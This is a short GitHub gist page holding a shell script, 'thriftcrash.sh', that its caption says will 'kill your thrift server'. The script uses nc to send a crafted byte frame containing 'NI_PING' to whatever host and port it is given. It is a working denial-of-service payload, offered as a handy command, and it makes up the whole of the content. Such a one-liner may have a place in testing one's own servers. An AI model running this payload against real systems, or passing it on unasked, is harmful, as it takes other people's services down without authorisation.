Skip to content

Instantly share code, notes, and snippets.

@olix0r
olix0r / thriftcrash.sh
Created July 27, 2017 18:35
Kill your thrift server with this handy dandy command
#!/bin/sh
set -e
echo -n -e \\x00\\x00\\x00\\x08\\x4e\\x49\\x5f\\x50\\x49\\x4e\\x47\\x00 | nc $@